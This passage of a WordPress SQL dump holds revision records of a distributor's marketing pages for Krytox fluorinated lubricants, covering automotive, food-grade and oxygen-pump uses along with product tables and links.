sticky over time.</li>\r\n 	<li>Plastic door panel and metal frame—Because Krytox™ is compatible with metals, elastomers, and plastics, it effectively silences noise caused by the interaction of various materials. And, Krytox™ won’t oxidize or discolor plastic. Apply by spraying by hand or using a robot.</li>\r\n 	<li>Rubber gaskets and seals—A thin film of Krytox™ can lubricate sliding contact in convertible tops, sunroofs, trunk lids, and doors to keep the rubber compound in good condition, and protected from oxidation. Grease or oil can be applied by hand, or a jig can be used to guide the application.</li>\r\n 	<li>Window lift systems and weather stripping—Krytox™ can stop weather strip “bunching” and “gathering,” and help eliminate the wind noise produced as window glass is raised. Awkward configuration\r\nof these seals usually means that automatic application is difficult. An automatic dispenser in conjunction with disposable foam applicators is often used. The amount can be controlled by ensuring a preset quantity is dispensed directly from the supply onto the applicator.</li>\r\n</ul>\r\n<img class="alignnone size-medium wp-image-2452" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/noise-vibration-harshness-800x455.jpg" alt="noise-vibration-harshness" width="800" height="455" />\r\n\r\n<strong>Application Systems</strong>\r\n\r\nThere are several manufacturers of equipment that can be used for these applications. The systems can be purchased from one source or fabricated locally from many sources. Automatic dispensing systems for adhesives, sealants, or lubricants can be used as the supply system. Manufacturers such as GRACO, Hydrotech, LCC-Dispensit, or a local distributor can provide controlled application systems for precise dispensing.\r\n\r\nUse of disposable foam tips or brushes can allow accurate coverage of most shapes. Companies such as Designetics or others can provide help in this area.\r\n\r\nChoose Krytox™ for long-lasting lubrication that helps improve vehicle performance and customer satisfaction.\r\n\r\nWhatever your engineering challenge—longer part life, extreme temperatures, reduced failures—performance lubricants from Chemours can help. At Chemours, we put our science to work to produce lubricants that can stand up to today’s engineering design demands—no matter how tough the conditions. It’s reliability you can count on, from a name you trust.\r\n\r\n[ux_product_categories ids="46,37,45" number="10"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox™ For Automotive Noise, Vibration, and Harshness', '', 'inherit', 'closed', 'closed', '', '2450-revision-v1', '', '', '2016-10-12 19:32:30', '2016-10-12 19:32:30', '', 2450, 'https://www.miller-stephenson.com/2450-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2578, 2, '2016-10-12 19:35:00', '2016-10-12 19:35:00', '<h1><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox™</a> NSF H-1 Food Grade Lubricants - Safe for Incidental Food Contact</strong></h1>\r\nChoosing the right lubricant for your equipment just got a lot easier with H-1 certified Krytox™ food grade lubricants from Miller-Stephenson.\r\n\r\nAs with the full line of Krytox™ lubricants, Krytox™ oils and greases deliver superior performance with advanced features of high-temperature stability, nonflammability, and chemical and biological inertness. Krytox lubricants will not carbonize or form gummy deposits that typically cause failures, nor will they evaporate. Therefore, maintenance costs can be significantly reduced.\r\n\r\nThe composition of Krytox™ lubricants allows them to function in a wide range of operating temperatures and chemical environments. Krytox™ food grade lubricants will not break down under mechanical stress. The oils are clear, colorless, and odorless, and the grease is white.\r\n\r\nKrytox lubricants comply fully with USDA performance standards for designated uses. These lubricant products are not intended to be used as direct food additives. Use Krytox™ oils and greases whenever a long-lasting, tenacious, chemically inert lubricant is needed for your demanding applications.\r\n<h2>Stability and Compatibility</h2>\r\nKrytox™ oils contain only carbon, oxygen, and fluorine. The oils will not burn or support combustion, even in 100% liquid or gaseous oxygen. They are chemically inert and will not break\r\ndown in the presence of most chemicals.\r\n\r\nBecause Krytox™ food grade lubricants are essentially inert, they are safe to use with most metals, plastics, and seal materials, and they are completely resistant to water and steam. Krytox™ lubricants protect bearings and other components under a wide range of load and speed conditions. Components run quieter, and wear protection is extended. Krytox™ lubricants will not break down under extreme pressure or high mechanical stress.\r\n\r\nVarious grades of Krytox™ food grade lubricants are serviceable for long periods of time at continuous temperatures between –60–300 °C (–58–600 °F). There are also special grades that can routinely handle temperatures of 350 °C (662 °F) and withstand peaks up to 400 °C (752 °F) for shorter periods of time.\r\n\r\nUse Krytox™ lubricants on chains, bearings, valves, seals, or any place a long-lasting lubricant is needed.\r\n<h2>Safety and Environmental Protection</h2>\r\nUsing Krytox™ greases and oils:\r\n<ul>\r\n 	<li>Reduces the need for hydrocarbon lubricants</li>\r\n 	<li>Helps allay any concerns about emissions or other potential environmental impact</li>\r\n 	<li>Avoids the inconvenience and cost associated with the disposal of hydrocarbon-based oils and greases.</li>\r\n</ul>\r\nKrytox™ greases and oils are non-toxic, easy to handle, and do not release volatile organic compounds to the atmosphere. Additionally, Chemours has a regeneration program that reclaims used oil and restores it to its original properties. This lowers the overall cost of lubrication, and eliminates safety and environmental disposal problems.\r\n\r\n<img class="alignnone wp-image-2443" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Krytox-Hydrocarbon.jpg" alt="krytox-hydrocarbon" width="349" height="364" />\r\n<h2>Benefits in Use</h2>\r\nThe extended life you will see with Krytox™ lubricants means longer re-lubrication intervals, less maintenance, and improved cleanliness. The overall superior stability of Krytox™ lubricants also can result in less downtime and fewer failures due to lubricant carbonization, evaporation, or other deterioration. Water washout and steam cleaning will not affect Krytox™ lubricants. In addition, because Krytox™ lubricants can be used in many applications and last so long, your total lubricant inventory can be reduced, as well as the need for frequent movement of drums around your facility.\r\n\r\nThe combination of all of these factors translates to long-term cost savings for your business.\r\n\r\n<img class="alignnone size-medium wp-image-2444" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/krytox-comparison-800x311.jpg" alt="krytox-comparison" width="800" height="311" />\r\n<h2>Applications for Krytox™ H-1 Food Grade Lubricants</h2>\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong>Type</strong></td>\r\n<td width="206"><strong>Products</strong></td>\r\n<td width="206"><strong>Application</strong></td>\r\n<td width="206"><strong>Comments</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/">Multipurpose Greases</a></td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-gpl-202/">Krytox™ GPL 202</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-203/">Krytox™ GPL 203</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-205/">Krytox™ GPL 205</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-206/">Krytox™ GPL 206</a></td>\r\n<td>Bearings, valves, seals, O-rings</td>\r\n<td>For non-corrosive environments at standard operating temperatures</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">Anti-Corrosion Greases</a></td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-gpl-223/">Krytox™ GPL 223</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">Krytox™ GPL 225</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-226/">Krytox™ GPL 226</a>\r\nKrytox™ FG 34</td>\r\n<td>Bearings, valves, seals, O-rings</td>\r\n<td>For non-corrosive environments at standard operating temperatures</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/">High-Temperature Greases</a></td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-xht-sx/">Krytox™ XHT-SX</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-xht-ac/">Krytox™ XHT-AC</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-xht-acx/">Krytox™ XHT-ACX</a></td>\r\n<td>Bearings and chains</td>\r\n<td>Krytox™ XHT-AC and ACX contain corrosion inhibitor</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Lubricating Oils</td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-gpl-105/">Krytox™ GPL 105</a>\r\n<a href="https://www.miller-stephenson.com/product/xht-500/">Krytox™ XHT-500</a>\r\n<a href="https://www.miller-stephenson.com/product/xp-1a5/">Krytox™ XP-1A5</a>\r\nKrytox™ FG 40</td>\r\n<td>Chains, compressors, bearings, gear boxes</td>\r\n<td>Krytox™ XHT-500 is formulated for high temperatures; Krytox™ XP-1A5 contains corrosion inhibitor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-vpf-1506/">Krytox™ 1506</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ 1514</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-vpf-1525/">Krytox™ 1525</a></td>\r\n<td>Mechanical pumps</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n[ux_product_categories ids="46,115,38" number="10"]', 'Krytox™ H-1 Food Grade Lubricants', '', 'inherit', 'closed', 'closed', '', '2442-revision-v1', '', '', '2016-10-12 19:35:00', '2016-10-12 19:35:00', '', 2442, 'https://www.miller-stephenson.com/2442-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2579, 2, '2016-10-12 19:35:43', '2016-10-12 19:35:43', '<strong>Oxygen Pump Lubricant for an Indian steel manufacturer saves money</strong>\r\n\r\n<strong>Steel manufacturer in India ensures safety while cutting costs</strong>\r\n\r\nA steel manufacturer located in India wanted to find a more cost-effective gearbox lubricant for its oxygen pumps, but did not want to compromise the performance or safety of its operations. The manufacturer wanted to proceed cautiously, conducting validation tests before making any decisions to switch lubricants.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nThe oxygen pumps at the steel plant are used to transfer liquid oxygen. Therefore, the oxygen pump lubricant chosen for the gearbox, which is located between the oxygen pump and the electrical motor, needed to be nonflammable and nonreactive with liquid oxygen.\r\n\r\n<strong>The Solution</strong>\r\n\r\nThe manufacturer tested <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> in several of its oxygen pump gearboxes over the course of two years and was convinced that this lubricant offered the performance and safety it required for this demanding application. Following this validation period, the manufacturer began using <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> lubricant in all of its oxygen pump gearboxes and is realizing an annual cost savings of $2,000 USD.\r\n\r\n<strong>Key Advantages</strong>\r\n<ul>\r\n 	<li>Using <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> lubricant, the manufacturer was able to save $2,000 annually while continuing optimum operation of the gearboxes in its oxygen pumps.</li>\r\n 	<li>Krytox™ lubricants from Chemours have been independently tested by major corporations and organizations, and they have been confirmed for use with oxygen and other reactive chemical compatibility.</li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> can be safely used in oxygen and reactive gas service equipment.</li>\r\n</ul>\r\n<strong>Suggested Products:</strong>\r\n\r\n[product id="954"][product id="944"][product id="943"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox™ Oxygen Pump Lubricant Case Study', '', 'inherit', 'closed', 'closed', '', '2410-revision-v1', '', '', '2016-10-12 19:35:43', '2016-10-12 19:35:43', '', 2410, 'https://www.miller-stephenson.com/2410-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2580, 2, '2016-10-12 19:36:56', '2016-10-12 19:36:56', '<h1><strong>Krytox™ Performance Lubricants | Automotive Lubricants specifically designed for Automotive needs</strong></h1>\r\nPowered by Chemours Science… Over the last fifty years, Krytox™ automotive lubricants have helped customers outpace the competition by bringing customized and innovative solutions into an increasingly competitive automotive industry.\r\n\r\nWhatever your engineering challenge—longer part life, extreme temperatures, reduced failures—Krytox™ performance lubricants can help. At Chemours, we put our science to work to produce lubricants that can stand up under the extremely demanding conditions of today’s engineering design standards.\r\n<h4><strong>Advanced Solutions for the Automotive Industry | Automotive Lubricants</strong></h4>\r\nKrytox™ performance lubricants offer a wide range of high quality, high performance lubricants to address the most challenging and complex requirements of original equipment manufacturers (OEMs) and world-class Tier One suppliers.\r\n\r\nOur family of oils, greases, and coatings will provide long-term operational excellence and high performance lubrication in extreme operating conditions.\r\n\r\nAutomotive design engineers have learned that specifying Krytox™ lubricants during the design phase can provide OEMs with significant cost savings. By lengthening the life of critical components and improving consumer satisfaction, Krytox™ lubricants help reduce repair costs and potentially save millions in warranty claims.\r\n<h4><strong>Longer Lasting Lubrication</strong></h4>\r\nAutomakers are striving for extended warranties, expecting longer intervals between vehicle service visits and very limited relubrication operations. Krytox™ lubricants have provided state-of-the art performance for mechanical systems, such as gearboxes, bearings, chains, seals, actuators, valves, and other components. Krytox™ lubricants don’t oxidize; they provide excellent lubricity and a high viscosity index through a broad range of viscosity grades. Most applications where Krytox™ lubricants are specified are considered by OEMs to be lubricated for the expected lifetime of the vehicle.\r\n<h4><strong>The Right Choice for Your Design Challenge</strong></h4>\r\nKrytox™ oils and greases are based on perfluoropolyether (PFPE) oils, with a full range of viscosities available. These synthetic fluorinated lubricants are effective from -75 °C to greater than 400 °C (-103 to &gt;752 °F), depending upon operating conditions and product grade.\r\n<h4><strong>Krytox™ performance lubricants have properties that reduce impact on the environment:</strong></h4>\r\n<ul>\r\n 	<li>Krytox™ products are fully synthetic—not petroleum-based—and totally inert, so Krytox™ oils and greases do not react with anything in the environment. Unlike other automotive lubricants, at temperatures under 350 ºC (662 °F), Krytox™ oil does not oxidize or break down into other substances that could be harmful.</li>\r\n 	<li>Krytox™ lubricants do not contain any volatile organic compounds (VOCs), according to the U.S. EPA definition. Our full fluorinated automotive lubricants are made of fluorine, oxygen, and carbon only.</li>\r\n 	<li>Krytox™ products have a very long service life. This means that products do not have to be replaced and disposed of frequently, which reduces waste.</li>\r\n 	<li>Because the Krytox™ molecule stays intact, the oils can be recycled if they become contaminated. The recycled products can then be returned to the customer for reuse.</li>\r\n 	<li>Krytox™ oils and greases are not considered hazardous wastes as manufactured under the U.S. EPA Resource and Recovery Conservation Act guidelines. However, treatment, storage, transportation, recycling, and disposal of these products must be in accordance with applicable federal, state/provincial, and local regulations.</li>\r\n</ul>\r\n<h4><strong>The Right Choice for Our Environment</strong></h4>\r\nProtection of the environment and people is a core value of Chemours. Our sustainability goals go beyond traditional footprint reduction to include goals that tie our business growth to the development of safer and environmentally improved new products and sustainable solutions.\r\n\r\nKrytox™ lubricants provide longer lasting lubrication, which lowers the frequency of relubrication; therefore, reducing the use of materials and reducing waste—important steps in helping to reduce product impact on the environment.\r\n<h4><strong>Effective Over a Wide Temperature Range</strong></h4>\r\nKrytox™ greases typically last 5-50 times longer than standard greases. One common bearing test that demonstrates the extreme performance of various grades of Krytox™ grease is the ASTM D-3336 test method, where heating/cooling test cycles are continued until failure or the completion of a specified number of hours of running time.\r\n\r\nTest results have shown that Krytox™ greases can continue to perform beyond thousands of hours and at temperatures beyond the range specified for most applications—even outlasting the tester itself.\r\n\r\nFigure 1 Ball Bearing Grease Performance Test with Krytox™ Greases\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong>Grade</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Recommended Temperature Range</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Viscosity 40°C/100°C</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Test Temperature</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Life, hr</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-224/">Krytox™ GPL 224</a></td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n<td style="text-align: center;">60/9</td>\r\n<td style="text-align: center;">180 °C (356 °F)</td>\r\n<td style="text-align: center;">4,900+</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2245/">Krytox™ AUT 2245</a></td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n<td style="text-align: center;">100/12.3</td>\r\n<td style="text-align: center;">200 °C (392 °F)</td>\r\n<td style="text-align: center;">5,500+</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">Krytox™ GPL 225</a></td>\r\n<td style="text-align: center;">-36–204 °C (-33–399 °F)</td>\r\n<td style="text-align: center;">160/18</td>\r\n<td style="text-align: center;">200 °C (392 °F)</td>\r\n<td style="text-align: center;">5,000+</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-xht-ac/">Krytox™ XHT AC</a></td>\r\n<td style="text-align: center;">-20–300 °C (-4–572 °F)</td>\r\n<td style="text-align: center;">500/47</td>\r\n<td style="text-align: center;">250 °C (482 °F)</td>\r\n<td style="text-align: center;">2,000+</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h4><strong>Compatibility with Elastomers and Plastics</strong></h4>\r\nKrytox™ performance lubricants are compatible with the following common elastomers and plastics, as well as many more:\r\n<ul>\r\n 	<li>Fluorosilicone</li>\r\n 	<li>Hytrel® Polyester Elastomer</li>\r\n 	<li>Delrin® Acetal</li>\r\n 	<li>Ethylacrylate</li>\r\n 	<li>Methyl Silicone</li>\r\n 	<li>Butyl 325</li>\r\n 	<li>Neoprene WRT</li>\r\n 	<li>Kalrez® Fluoroelastomer*</li>\r\n 	<li>Zytel® Nylon</li>\r\n 	<li>Viton™ A Fluoroelastomer</li>\r\n 	<li>Nycar 100 (Buna N)</li>\r\n 	<li>Vespel®</li>\r\n 	<li>Urethane</li>\r\n 	<li>Hypalon® Synthetic Rubber</li>\r\n 	<li>EPT Peroxide Cure</li>\r\n 	<li>Hydrocarbon Rubber</li>\r\n 	<li>Teflon™ Fluoropolymer</li>\r\n</ul>\r\n<h4><strong>Compatibility with Metals</strong></h4>\r\nBecause of their low surface tensions, Krytox™ oils and greases easily lubricate metallic surfaces. Krytox™ lubricants are chemically inert and, therefore, have no adverse effect on metals when the temperature is below 288 °C (550 ºF).\r\n\r\nAbove this point, Krytox™ lubricants will be the best-in-class choice for many alloy steels, stainless steels, titanium alloy, nickel alloy, and cobalt alloy.\r\n<h4><strong>Robust Electrical Properties</strong></h4>\r\nKrytox™ oils are good insulators due to fundamental properties. Our synthetic fluorinated automotive lubricants are chemically inert, insoluble in most common solvents, and nonflammable.\r\n<h4><strong>Advanced Rust and Corrosion Protection from Environmental Challenges</strong></h4>\r\nKrytox™ lubricants are not sensitive to aggressive weather conditions, such as rain, snow, ice, dust, or grit, and they are extremely resistant to the harsh underhood chemical environment of fuel, coolant, brake fluid, engine oil, and washer solvent.\r\n<h4><strong>Cost-Effective</strong></h4>\r\nKrytox™ lubricants provide OEMs with significant cost savings when specified for use during the design phase. By lengthening the life of critical components, Krytox™ automotive lubricants reduce repair costs and potentially save millions in warranty claims.\r\n\r\nFigure 2 Krytox™ Performance Lubricants Product Range\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td width="250">Typical Automotive Lubricants Grade</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Base Oil Viscosity, cSt</td>\r\n<td style="text-align: center;" width="206">Useful Temperature Range</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-104/">Krytox™ GPL 104</a></td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-105/">Krytox™ GPL 105</a></td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 1045</td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-204/">Krytox™ GPL 204</a></td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-214/">Krytox™ GPL 214</a></td>\r\n<td>Grease with extreme pressure additive</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-224/">Krytox™ GPL 224</a></td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 294</td>\r\n<td>Grease with extreme pressure and anti-corrosion additives</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-xp-2a4/">Krytox™ XP2A4</a></td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2045/">Krytox™ AUT 2045</a></td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2245/">Krytox™ AUT 2245</a></td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2e45/">Krytox™ AUT 2E45</a></td>\r\n<td>Grease with sodium nitrite-free anti-corrosion additive</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2a45/">Krytox™ AUT 2A45</a></td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-205/">Krytox™ GPL 205</a></td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-215/">Krytox™ GPL 215</a></td>\r\n<td>Grease with extreme pressure additive</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">Krytox™ GPL 225</a></td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 295</td>\r\n<td>Grease with extreme pressure and anti-corrosion additives</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-xp-2a5/">Krytox™ XP2A5</a></td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ XP2C5</td>\r\n<td>Grease with anti-corrosion and anti-fretting additives</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nFigure 3 Krytox™ Performance Lubricants for Noise, Vibration, and Harshness (NVH) Eliminationless efficiently. When this occurs, the engine can overheat,\r\n\r\n<img class="alignnone size-medium wp-image-2391" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Automotive-Grease-800x411.jpg" alt="Automotive Grease" width="800" height="411" />\r\n<h4><strong>Krytox™ Performance Lubricants for Noise, Vibration, and Harshness</strong></h4>\r\nWithin an automobile’s interior, there are several places where different materials contact each other. Some examples include metal on plastic, leather on leather, and weather-stripping. Movement between these surfaces often results in a series of noise described as squeak, itch, or judder. Krytox™ lubricants can permanently eliminate these noises. They are easy to apply, have low volatility, and can remain in place over the vehicle’s entire lifetime. Furthermore, Krytox™ oils and greases are compatible with a wide variety of materials, and have the frictional and long-life characteristics that make them ideal automotive lubricants in these applications.\r\n<h4><strong>Krytox™ Performance Lubricants for Automotive Lubricants Underhood Applications</strong></h4>\r\nFan Clutch\r\n\r\nA thermostatically controlled fan clutch typically drives the cooling fan. The bearings that support the drive shaft for this clutch regularly experience high temperatures. If these bearings wear and begin to fail, the cooling fan runs less efficiently. When this occurs, the engine can overheat, and any resistance in fan clutch rotation can drain valuable power from the engine’s drive shaft, further reducing overall performance. Krytox™ lubricants have low volatility and a high viscosity index, providing long-life and excellent lubrication to the fan clutch bearing under these high temperature conditions.\r\n\r\nO-Ring Lubrication/Assembly Lube\r\n\r\nO-rings effectively seal many interfaces in an automobile. A lubricant is often applied to keep seals in place during assembly and allow them to assemble without damage. Choice of lubricant is critical: if the wrong lubricant is used for a given seal material, the seal could degrade, prematurely causing serious damage. Krytox™ lubricants are the preferred choice because they are compatible with all seal materials. Furthermore, Krytox™ lubricants do not contribute to seal degradation, because they do not oxidize, and they have greater temperature stability than the seals.\r\n\r\nAlternator\r\n\r\nThe alternator is usually belt-driven by the engine and supplies electricity to basic automobile functions (headlights, radio, etc.) while recharging the car battery. As the electricity is being generated, the alternators, and hence the bearings, get very hot. Standard lubricants volatilize in the extreme high temperature environment of the alternator, leading to alternator bearing failure.\r\n\r\nAs the bearings wear and begin to fail, they can increase the alternator’s resistance to rotation.\r\n\r\nThis reduces the alternator’s performance and robs performance from the rest of the automobile.\r\n\r\nPerhaps more critically, if the alternator bearings fail, the alternator will fail and the vehicle will stop running. The higher output alternators used in today’s vehicles generate a tremendous amount of heat, demanding the advanced, reliable performance and heat stability of Krytox™ lubricants.\r\n\r\nEGR Valve\r\n\r\nThe exhaust gas re-circulating (EGR) valve reduces nitrogen oxide (NOx) emissions formation by re-circulating some of the exhausted gas back into the engine cylinders. This lowers the peak temperatures inside the cylinder; thus, reducing the rate of NOx formation. If the valve does not open enough, insufficient re-circulation takes place and excess pollution is created. If, however, the valve sticks open, the temperature inside the cylinder can drop too much, decreasing engine performance and fuel mileage. Krytox™ lubricants are an ideal choice, as they withstand the high temperatures and exhaust fumes experienced by the EGR valve.\r\n\r\nFigure 4 Krytox™ Performance Lubricants for Automotive Underhood Applications\r\n\r\n<img class="alignnone size-medium wp-image-2397" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/automotive-lubricants-800x411.jpg" alt="automotive-lubricants" width="800" height="411" />\r\n\r\nSpark Plug Boots\r\n\r\nThe spark plug boot protects the spark plug from weather and prevents the unintentional grounding of the spark energy.\r\n\r\nThe boot is made of a silicone rubber, which, over time, can bond with the silicon ceramic of the spark plug, fusing the boot and the spark plug together. Once this occurs, the only way to remove the boot is by force, which can cause enough damage to require replacement of the entire assembly. Krytox™ automotive lubricants can prevent this fusion from taking place. Krytox™ automotive lubricants are ideal in this application because they are stable, non-reactive, and long-lasting. They can also withstand the high temperatures and energies of the spark plug environment.\r\n<h4><strong>The following Krytox lubricants are great automotive lubricants:</strong></h4>\r\n[ux_product_categories ids="96,98,97,37,168" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-automotive/">To learn more about non-bearing applications please click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">To learn more about Krytox GPL greases and oils, please click here. </a>\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">To learn more about Krytox AUT greases please click here. </a>\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">To learn more about Krytox XP bearing greases please click here.</a>\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox™ Solutions for the Automotive Industry', '', 'inherit', 'closed', 'closed', '', '2390-revision-v1', '', '', '2016-10-12 19:36:56', '2016-10-12 19:36:56', '', 2390, 'https://www.miller-stephenson.com/2390-revision-v1/', 0, 'revision', '', 0); 
